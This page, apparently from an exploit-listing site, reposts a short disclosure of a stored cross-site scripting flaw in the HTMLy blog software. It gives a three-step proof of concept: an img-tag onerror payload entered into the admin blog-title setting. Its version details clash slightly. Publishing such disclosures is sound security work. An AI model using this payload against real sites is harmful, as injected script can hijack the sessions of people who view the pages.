دروازه امنیت

security gate



HTMLy 2.9.6 Cross Site Scripting

2024-04-08
tmrswrr
Risk: low.
Local: No
Remote: Yes
CVE:
CWE: CWE-79
SGDB: SGDB-27471
dork:

# Exploit Title: HTMLy Version : 2.9.6 - Stored XSS # Exploit Author: tmrswrr # Vendor Homepage: https://www.htmly.com/ # Version 3.10.8.21 # Date : 04/08/2024 1 ) Login admin https://127.0.0.1/HTMLy/admin/config 2 ) General Setting > Blog title > "><img src=x onerrora=confirm() onerror=confirm(1)> 3 ) After save it you will be see xss alert



contact :

Comment it here.


(*) - required fields.  
twitter(X): @securitygateorg / telegram: @orgsecuritygate / instagram: @securitygateorg

Copyright 2024, securitygate.org